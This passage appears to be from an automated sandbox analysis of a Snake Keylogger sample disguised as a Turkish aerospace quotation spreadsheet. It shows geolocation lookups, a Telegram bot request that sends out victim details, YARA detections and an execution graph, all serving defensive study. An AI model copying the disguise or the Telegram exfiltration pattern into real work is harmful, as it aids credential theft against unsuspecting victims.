                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1605&min_rtt=1604&rtt_var=602&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1820448&cwnd=243&unsent_bytes=0&cid=c80a53bb0493dda2&ts=485&x=0"
                                                                                                                                  2024-12-16 12:37:30 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  8192.168.2.849726104.21.67.1524434780C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-16 12:37:33 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  2024-12-16 12:37:33 UTC869INHTTP/1.1 200 OK
                                                                                                                                  Date: Mon, 16 Dec 2024 12:37:33 GMT
                                                                                                                                  Content-Type: text/xml
                                                                                                                                  Content-Length: 362
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                  Age: 341422
                                                                                                                                  Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LfbPJDyDH8uVtIeEDOI0uYwtaEojB1tbw8fqDN8aSoUqOtUla1KUGUz7s2ClKvjMhwFllS1Lphlbo1IJ3yzaQOmh2ZRBGEJiMnJpdOfyMeS64bfbqOPKwnnwp0baKeWybckb9FZq"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8f2eb9b4fb6df78d-EWR
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1478&min_rtt=1469&rtt_var=570&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1887524&cwnd=55&unsent_bytes=0&cid=f72c0368216fe55c&ts=455&x=0"
                                                                                                                                  2024-12-16 12:37:33 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  9192.168.2.849727149.154.167.2204434780C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-16 12:37:35 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:767668%0D%0ADate%20and%20Time:%2017/12/2024%20/%2011:29:42%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20767668%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                                  Host: api.telegram.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  2024-12-16 12:37:35 UTC344INHTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx/1.18.0
                                                                                                                                  Date: Mon, 16 Dec 2024 12:37:35 GMT
                                                                                                                                  Content-Type: application/json
                                                                                                                                  Content-Length: 55
                                                                                                                                  Connection: close
                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                  2024-12-16 12:37:35 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                                  Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                                  Click to jump to process

                                                                                                                                  Click to jump to process

                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                  Click to jump to process

                                                                                                                                  Target ID:0
                                                                                                                                  Start time:07:37:03
                                                                                                                                  Start date:16/12/2024
                                                                                                                                  Path:C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe"
                                                                                                                                  Imagebase:0xfa0000
                                                                                                                                  File size:1'029'120 bytes
                                                                                                                                  MD5 hash:E984D47DDDDD227739D93D4712EEC8FA
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1492497825.0000000003670000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000000.00000002.1492497825.0000000003670000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1492497825.0000000003670000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1492497825.0000000003670000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1492497825.0000000003670000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000000.00000002.1492497825.0000000003670000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000000.00000002.1492497825.0000000003670000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                  Reputation:low
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:2
                                                                                                                                  Start time:07:37:04
                                                                                                                                  Start date:16/12/2024
                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe"
                                                                                                                                  Imagebase:0x3a0000
                                                                                                                                  File size:45'984 bytes
                                                                                                                                  MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.3938554197.0000000000772000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.3938554197.0000000000772000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.3938554197.0000000000772000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.3938554197.0000000000772000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.3940377959.0000000002701000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.3940377959.000000000280C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:false

                                                                                                                                  Reset < >

                                                                                                                                    Execution Graph

                                                                                                                                    Execution Coverage:3.5%
                                                                                                                                    Dynamic/Decrypted Code Coverage:0.4%
                                                                                                                                    Signature Coverage:7%
                                                                                                                                    Total number of Nodes:2000
                                                                                                                                    Total number of Limit Nodes:162
                                                                                                                                    execution_graph 104142 fdfdfc 104145 faab30 Mailbox _memmove 104142->104145 104147 fab525 104145->104147 104153 faa057 104145->104153 104167 fa9f37 Mailbox 104145->104167 104175 fab2b6 104145->104175 104178 fe086a 104145->104178 104180 fe0878 104145->104180 104182 fe085c 104145->104182 104183 fab21c 104145->104183 104185 fc0db6 59 API calls Mailbox 104145->104185 104188 ff6e8f 59 API calls 104145->104188 104191 101e4d1 104145->104191 104197 101df23 104145->104197 104202 fa9ea0 104145->104202 104226 fa9c90 59 API calls Mailbox 104145->104226 104230 101c193 85 API calls 2 library calls 104145->104230 104231 101c2e0 96 API calls Mailbox 104145->104231 104232 1007956 59 API calls Mailbox 104145->104232 104233 fa7de1 104145->104233 104237 101bc6b 341 API calls Mailbox 104145->104237 104238 ff617e 59 API calls Mailbox 104145->104238 104244 1009e4a 89 API calls 4 library calls 104147->104244 104150 fe09e5 104250 1009e4a 89 API calls 4 library calls 104150->104250 104151 fe0055 104239 1009e4a 89 API calls 4 library calls 104151->104239 104156 fab475 104240 fa8047 104156->104240 104157 fa8047 59 API calls 104157->104167 104158 fe0064 104159 fc0db6 59 API calls Mailbox 104159->104167 104162 fab47a 104162->104150 104162->104151 104165 fa7667 59 API calls 104165->104167 104166 ff6e8f 59 API calls 104166->104167 104167->104151 104167->104153 104167->104156 104167->104157 104167->104159 104167->104162 104167->104165 104167->104166 104168 fc2d40 67 API calls __cinit 104167->104168 104170 fe09d6 104167->104170 104174 faa55a 104167->104174 104200 fac8c0 341 API calls 2 library calls 104167->104200 104201 fab900 60 API calls Mailbox 104167->104201 104168->104167 104249 1009e4a 89 API calls 4 library calls 104170->104249 104248 1009e4a 89 API calls 4 library calls 104174->104248 104229 faf6a3 341 API calls 104175->104229 104246 fa9c90 59 API calls Mailbox 104178->104246 104247 1009e4a 89 API calls 4 library calls 104180->104247 104182->104153 104245 ff617e 59 API calls Mailbox 104182->104245 104227 fa9d3c 60 API calls Mailbox 104183->104227 104185->104145 104186 fab22d 104228 fa9d3c 60 API calls Mailbox 104186->104228 104188->104145 104193 101e4e4 104191->104193 104195 101e4f3 104193->104195 104251 fa9837 104193->104251 104195->104145 104362 101cadd 104197->104362 104199 101df33 104199->104145 104200->104167 104201->104167 104203 fa9ebf 104202->104203 104221 fa9eed Mailbox 104202->104221 104204 fc0db6 Mailbox 59 API calls 104203->104204 104204->104221 104205 fc2d40 67 API calls __cinit 104205->104221 104206 fab475 104208 fa8047 59 API calls 104206->104208 104207 fab47a 104209 fe09e5 104207->104209 104210 fe0055 104207->104210 104214 faa057 104208->104214 104499 1009e4a 89 API calls 4 library calls 104209->104499 104496 1009e4a 89 API calls 4 library calls 104210->104496 104214->104145 104215 fe0064 104215->104145 104216 fc0db6 59 API calls Mailbox 104216->104221 104219 fa8047 59 API calls 104219->104221 104220 fa7667 59 API calls 104220->104221 104221->104205 104221->104206 104221->104207 104221->104210 104221->104214 104221->104216 104221->104219 104221->104220 104222 ff6e8f 59 API calls 104221->104222 104223 fe09d6 104221->104223 104225 faa55a 104221->104225 104494 fac8c0 341 API calls 2 library calls 104221->104494 104495 fab900 60 API calls Mailbox 104221->104495 104222->104221 104498 1009e4a 89 API calls 4 library calls 104223->104498 104497 1009e4a 89 API calls 4 library calls 104225->104497 104226->104145 104227->104186 104228->104175 104229->104147 104230->104145 104231->104145 104232->104145 104234 fa7df0 __wsetenvp _memmove 104233->104234 104235 fc0db6 Mailbox 59 API calls 104234->104235 104236 fa7e2e 104235->104236 104236->104145 104237->104145 104238->104145 104239->104158 104241 fa805a 104240->104241 104242 fa8052 104240->104242 104241->104153 104500 fa7f77 59 API calls 2 library calls 104242->104500 104244->104182 104245->104153 104246->104182 104247->104182 104248->104153 104249->104150 104250->104153 104252 fa9851 104251->104252 104261 fa984b 104251->104261 104253 fa9899 104252->104253 104254 fdf4da 104252->104254 104256 fdf5d3 __i64tow 104252->104256 104257 fa9857 __itow 104252->104257 104285 fc3698 83 API calls 3 library calls 104253->104285 104262 fc0db6 Mailbox 59 API calls 104254->104262 104268 fdf552 Mailbox _wcscpy 104254->104268 104256->104256 104275 fc0db6 104257->104275 104260 fa9871 104260->104261 104263 fa7de1 59 API calls 104260->104263 104269 1007729 104261->104269 104265 fdf51f 104262->104265 104263->104261 104264 fc0db6 Mailbox 59 API calls 104266 fdf545 104264->104266 104265->104264 104267 fa7de1 59 API calls 104266->104267 104266->104268 104267->104268 104286 fc3698 83 API calls 3 library calls 104268->104286 104270 1007736 104269->104270 104271 fc0db6 Mailbox 59 API calls 104270->104271 104272 100773d 104271->104272 104315 1005b7a 104272->104315 104274 1007780 Mailbox 104274->104195 104277 fc0dbe 104275->104277 104278 fc0dd8 104277->104278 104280 fc0ddc std::exception::exception 104277->104280 104287 fc571c 104277->104287 104304 fc33a1 DecodePointer 104277->104304 104278->104260 104305 fc859b RaiseException 104280->104305 104282 fc0e06 104306 fc84d1 58 API calls _free 104282->104306 104284 fc0e18 104284->104260 104285->104257 104286->104256 104288 fc5797 104287->104288 104302 fc5728 104287->104302 104313 fc33a1 DecodePointer 104288->104313 104290 fc5733 104290->104302 104307 fca16b 58 API calls __NMSG_WRITE 104290->104307 104308 fca1c8 58 API calls 7 library calls 104290->104308 104309 fc309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 104290->104309 104291 fc579d 104314 fc8b28 58 API calls __getptd_noexit 104291->104314 104294 fc575b RtlAllocateHeap 104296 fc578f 104294->104296 104294->104302 104296->104277 104297 fc5783 104311 fc8b28 58 API calls __getptd_noexit 104297->104311 104301 fc5781 104312 fc8b28 58 API calls __getptd_noexit 104301->104312 104302->104290 104302->104294 104302->104297 104302->104301 104310 fc33a1 DecodePointer 104302->104310 104304->104277 104305->104282 104306->104284 104307->104290 104308->104290 104310->104302 104311->104301 104312->104296 104313->104291 104314->104296 104333 fa7e4f 104315->104333 104317 1005b8d CharLowerBuffW 104318 1005ba0 104317->104318 104319 fa79f2 59 API calls 104318->104319 104320 1005bda 104318->104320 104332 1005baa _memset Mailbox 104318->104332 104319->104318 104321 1005bec 104320->104321 104352 fa79f2 104320->104352 104323 fc0db6 Mailbox 59 API calls 104321->104323 104326 1005c1a 104323->104326 104328 1005c39 104326->104328 104355 1005ab6 59 API calls 104326->104355 104327 1005c78 104329 fc0db6 Mailbox 59 API calls 104327->104329 104327->104332 104337 1005cd7 104328->104337 104330 1005c92 104329->104330 104331 fc0db6 Mailbox 59 API calls 104330->104331 104331->104332 104332->104274 104334 fa7e62 104333->104334 104336 fa7e5f _memmove 104333->104336 104335 fc0db6 Mailbox 59 API calls 104334->104335 104335->104336 104336->104317 104356 fa7667 104337->104356 104340 fa7667 59 API calls 104341 1005d12 104340->104341 104342 fa7667 59 API calls 104341->104342 104345 1005d1b _wcscmp 104342->104345 104343 1005ff0 Mailbox 104343->104327 104344 fc3606 GetStringTypeW 104344->104345 104345->104343 104345->104344 104346 fa7924 59 API calls 104345->104346 104347 fa7bcc 59 API calls 104345->104347 104349 1005cd7 60 API calls 104345->104349 104350 fc358a 59 API calls 104345->104350 104351 fa8047 59 API calls 104345->104351 104361 fc362c GetStringTypeW _iswctype 104345->104361 104346->104345 104347->104345 104349->104345 104350->104345 104351->104345 104353 fa7e4f 59 API calls 104352->104353 104354 fa79fd 104353->104354 104354->104321 104355->104326 104357 fc0db6 Mailbox 59 API calls 104356->104357 104358 fa7688 104357->104358 104359 fc0db6 Mailbox 59 API calls 104358->104359 104360 fa7696 104359->104360 104360->104340 104361->104345 104363 fa9837 84 API calls 104362->104363 104364 101cb1a 104363->104364 104389 101cb61 Mailbox 104364->104389 104400 101d7a5 104364->104400 104366 101cdb9 104367 101cf2e 104366->104367 104371 101cdc7 104366->104371 104450 101d8c8 92 API calls Mailbox 104367->104450 104370 101cf3d 104370->104371 104372 101cf49 104370->104372 104413 101c96e 104371->104413 104372->104389 104373 fa9837 84 API calls 104387 101cbb2 Mailbox 104373->104387 104378 101ce00 104428 fc0c08 104378->104428 104381 101ce33 104435 fa92ce 104381->104435 104382 101ce1a 104434 1009e4a 89 API calls 4 library calls 104382->104434 104385 101ce25 GetCurrentProcess TerminateProcess 104385->104381 104387->104366 104387->104373 104387->104389 104432 101fbce 59 API calls 2 library calls 104387->104432 104433 101cfdf 61 API calls 2 library calls 104387->104433 104389->104199 104392 101cfa4 104392->104389 104395 101cfb8 FreeLibrary 104392->104395 104393 101ce6b 104447 101d649 107 API calls _free 104393->104447 104395->104389 104399 101ce7c 104399->104392 104448 fa8d40 59 API calls Mailbox 104399->104448 104449 fa9d3c 60 API calls Mailbox 104399->104449 104451 101d649 107 API calls _free 104399->104451 104401 fa7e4f 59 API calls 104400->104401 104402 101d7c0 CharLowerBuffW 104401->104402 104452 fff167 104402->104452 104406 fa7667 59 API calls 104407 101d7f9 104406->104407 104459 fa784b 104407->104459 104409 101d810 104472 fa7d2c 104409->104472 104411 101d81c Mailbox 104412 101d858 Mailbox 104411->104412 104476 101cfdf 61 API calls 2 library calls 104411->104476 104412->104387 104414 101c989 104413->104414 104418 101c9de 104413->104418 104415 fc0db6 Mailbox 59 API calls 104414->104415 104416 101c9ab 104415->104416 104417 fc0db6 Mailbox 59 API calls 104416->104417 104416->104418 104417->104416 104419 101da50 104418->104419 104420 101dc79 Mailbox 104419->104420 104427 101da73 _strcat _wcscpy __wsetenvp 104419->104427 104420->104378 104421 fa9b3c 59 API calls 104421->104427 104422 fa9b98 59 API calls 104422->104427 104423 fa9be6 59 API calls 104423->104427 104424 fc571c 58 API calls __crtGetStringTypeA_stat 104424->104427 104425 fa9837 84 API calls 104425->104427 104427->104420 104427->104421 104427->104422 104427->104423 104427->104424 104427->104425 104483 1005887 61 API calls 2 library calls 104427->104483 104429 fc0c1d 104428->104429 104430 fc0cb5 VirtualProtect 104429->104430 104431 fc0c83 104429->104431 104430->104431 104431->104381 104431->104382 104432->104387 104433->104387 104434->104385 104436 fa92d6 104435->104436 104437 fc0db6 Mailbox 59 API calls 104436->104437 104438 fa92e4 104437->104438 104439 fa92f0 104438->104439 104484 fa91fc 59 API calls Mailbox 104438->104484 104441 fa9050 104439->104441 104485 fa9160 104441->104485 104443 fa905f 104444 fc0db6 Mailbox 59 API calls 104443->104444 104445 fa90fb 104443->104445 104444->104445 104445->104399 104446 fa8d40 59 API calls Mailbox 104445->104446 104446->104393 104447->104399 104448->104399 104449->104399 104450->104370 104451->104399 104454 fff192 __wsetenvp 104452->104454 104453 fff1d1 104453->104406 104453->104411 104454->104453 104455 fff278 104454->104455 104456 fff1c7 104454->104456 104455->104453 104478 fa78c4 61 API calls 104455->104478 104456->104453 104477 fa78c4 61 API calls 104456->104477 104460 fa785a 104459->104460 104461 fa78b7 104459->104461 104460->104461 104463 fa7865 104460->104463 104462 fa7d2c 59 API calls 104461->104462 104469 fa7888 _memmove 104462->104469 104464 fdeb09 104463->104464 104465 fa7880 104463->104465 104480 fa8029 104464->104480 104479 fa7f27 59 API calls Mailbox 104465->104479 104468 fdeb13 104470 fc0db6 Mailbox 59 API calls 104468->104470 104469->104409 104471 fdeb33 104470->104471 104473 fa7d3a 104472->104473 104475 fa7d43 _memmove 104472->104475 104474 fa7e4f 59 API calls 104473->104474 104473->104475 104474->104475 104475->104411 104476->104412 104477->104456 104478->104455 104479->104469 104481 fc0db6 Mailbox 59 API calls 104480->104481 104482 fa8033 104481->104482 104482->104468 104483->104427 104484->104439 104486 fa9169 Mailbox 104485->104486 104487 fdf19f 104486->104487 104492 fa9173 104486->104492 104488 fc0db6 Mailbox 59 API calls 104487->104488 104490 fdf1ab 104488->104490 104489 fa917a 104489->104443 104492->104489 104493 fa9c90 59 API calls Mailbox 104492->104493 104493->104492 104494->104221 104495->104221 104496->104215 104497->104214 104498->104209 104499->104214 104500->104241 104501 fae5ab 104504 fad100 104501->104504 104503 fae5b9 104505 fad11d 104504->104505 104533 fad37d 104504->104533 104506 fe26e0 104505->104506 104507 fe2691 104505->104507 104536 fad144 104505->104536 104555 101a3e6 341 API calls __cinit 104506->104555 104509 fe2694 104507->104509 104518 fe26af 104507->104518 104511 fe26a0 104509->104511 104509->104536 104553 101a9fa 341 API calls 104511->104553 104515 fad434 104544 fa8a52 68 API calls 104515->104544 104516 fe28b5 104516->104516 104517 fad54b 104517->104503 104518->104533 104554 101aea2 341 API calls 3 library calls 104518->104554 104522 fe27fc 104559 101a751 89 API calls 104522->104559 104523 fad443 104523->104503 104533->104517 104560 1009e4a 89 API calls 4 library calls 104533->104560 104534 fa9ea0 341 API calls 104534->104536 104535 fa8047 59 API calls 104535->104536 104536->104515 104536->104517 104536->104522 104536->104533 104536->104534 104536->104535 104538 fa8740 68 API calls __cinit 104536->104538 104539 fa8542 68 API calls 104536->104539 104540 fa84c0 104536->104540 104545 fa843a 68 API calls 104536->104545 104546 facf7c 341 API calls 104536->104546 104547 fa9dda 59 API calls Mailbox 104536->104547 104548 fc2d40 104536->104548 104551 facf00 89 API calls 104536->104551 104552 facd7d 341 API calls 104536->104552 104556 fa8a52 68 API calls 104536->104556 104557 fa9d3c 60 API calls Mailbox 104536->104557 104558 ff678d 60 API calls 104536->104558 104538->104536 104539->104536 104541 fa84cb 104540->104541 104542 fa84f2 104541->104542 104561 fa89b3 69 API calls Mailbox 104541->104561 104542->104536 104544->104523 104545->104536 104546->104536 104547->104536 104562 fc2c44 104548->104562 104550 fc2d4b 104550->104536 104551->104536 104552->104536 104553->104517 104554->104533 104555->104536 104556->104536 104557->104536 104558->104536 104559->104533 104560->104516 104561->104542 104563 fc2c50 __wfsopen 104562->104563 104570 fc3217 104563->104570 104569 fc2c77 __wfsopen 104569->104550 104587 fc9c0b 104570->104587 104572 fc2c59 104573 fc2c88 DecodePointer DecodePointer 104572->104573 104574 fc2cb5 104573->104574 104575 fc2c65 104573->104575 104574->104575 104633 fc87a4 59 API calls __wfsopen 104574->104633 104584 fc2c82 104575->104584 104577 fc2d18 EncodePointer EncodePointer 104577->104575 104578 fc2cc7 104578->104577 104579 fc2cec 104578->104579 104634 fc8864 61 API calls 2 library calls 104578->104634 104579->104575 104582 fc2d06 EncodePointer 104579->104582 104635 fc8864 61 API calls 2 library calls 104579->104635 104582->104577 104583 fc2d00 104583->104575 104583->104582 104636 fc3220 104584->104636 104588 fc9c1c 104587->104588 104589 fc9c2f EnterCriticalSection 104587->104589 104594 fc9c93 104588->104594 104589->104572 104591 fc9c22 104591->104589 104618 fc30b5 58 API calls 3 library calls 104591->104618 104595 fc9c9f __wfsopen 104594->104595 104596 fc9ca8 104595->104596 104597 fc9cc0 104595->104597 104619 fca16b 58 API calls __NMSG_WRITE 104596->104619 104602 fc9ce1 __wfsopen 104597->104602 104622 fc881d 58 API calls 2 library calls 104597->104622 104600 fc9cad 104620 fca1c8 58 API calls 7 library calls 104600->104620 104601 fc9cd5 104605 fc9cdc 104601->104605 104606 fc9ceb 104601->104606 104602->104591 104604 fc9cb4 104621 fc309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 104604->104621 104623 fc8b28 58 API calls __getptd_noexit 104605->104623 104609 fc9c0b __lock 58 API calls 104606->104609 104611 fc9cf2 104609->104611 104612 fc9cff 104611->104612 104613 fc9d17 104611->104613 104624 fc9e2b InitializeCriticalSectionAndSpinCount 104612->104624 104625 fc2d55 104613->104625 104616 fc9d0b 104631 fc9d33 LeaveCriticalSection _doexit 104616->104631 104619->104600 104620->104604 104622->104601 104623->104602 104624->104616 104626 fc2d5e RtlFreeHeap 104625->104626 104627 fc2d87 __dosmaperr 104625->104627 104626->104627 104628 fc2d73 104626->104628 104627->104616 104632 fc8b28 58 API calls __getptd_noexit 104628->104632 104630 fc2d79 GetLastError 104630->104627 104631->104602 104632->104630 104633->104578 104634->104579 104635->104583 104639 fc9d75 LeaveCriticalSection 104636->104639 104638 fc2c87 104638->104569 104639->104638 104640 fe416f 104644 ff5fe6 104640->104644 104642 fe417a 104643 ff5fe6 85 API calls 104642->104643 104643->104642 104645 ff6020 104644->104645 104651 ff5ff3 104644->104651 104645->104642 104646 ff6022 104665 fa9328 84 API calls Mailbox 104646->104665 104648 ff6027 104649 fa9837 84 API calls 104648->104649 104650 ff602e 104649->104650 104655 fa7b2e 104650->104655 104651->104645 104651->104646 104651->104648 104653 ff601a 104651->104653 104664 fa95a0 59 API calls _wcsstr 104653->104664 104656 fdec6b 104655->104656 104657 fa7b40 104655->104657 104672 ff7bdb 59 API calls _memmove 104656->104672 104666 fa7a51 104657->104666 104660 fa7b4c 104660->104645 104661 fdec75 104662 fa8047 59 API calls 104661->104662 104663 fdec7d Mailbox 104662->104663 104664->104645 104665->104648 104667 fa7a5f 104666->104667 104668 fa7a85 _memmove 104666->104668 104667->104668 104669 fc0db6 Mailbox 59 API calls 104667->104669 104668->104660 104668->104668 104670 fa7ad4 104669->104670 104671 fc0db6 Mailbox 59 API calls 104670->104671 104671->104668 104672->104661 104673 fa107d 104678 fa708b 104673->104678 104675 fa108c 104676 fc2d40 __cinit 67 API calls 104675->104676 104677 fa1096 104676->104677 104679 fa709b __write_nolock 104678->104679 104680 fa7667 59 API calls 104679->104680 104681 fa7151 104680->104681 104709 fa4706 104681->104709 104683 fa715a 104716 fc050b 104683->104716 104690 fa7667 59 API calls 104691 fa718b 104690->104691 104735 fa7d8c 104691->104735 104693 fa7194 RegOpenKeyExW 104694 fde8b1 RegQueryValueExW 104693->104694 104699 fa71b6 Mailbox 104693->104699 104695 fde8ce 104694->104695 104696 fde943 RegCloseKey 104694->104696 104697 fc0db6 Mailbox 59 API calls 104695->104697 104696->104699 104708 fde955 _wcscat Mailbox __wsetenvp 104696->104708 104698 fde8e7 104697->104698 104739 fa522e 104698->104739 104699->104675 104702 fde90f 104742 fa7bcc 104702->104742 104704 fa79f2 59 API calls 104704->104708 104705 fde929 104705->104696 104706 fa7de1 59 API calls 104706->104708 104707 fa3f74 59 API calls 104707->104708 104708->104699 104708->104704 104708->104706 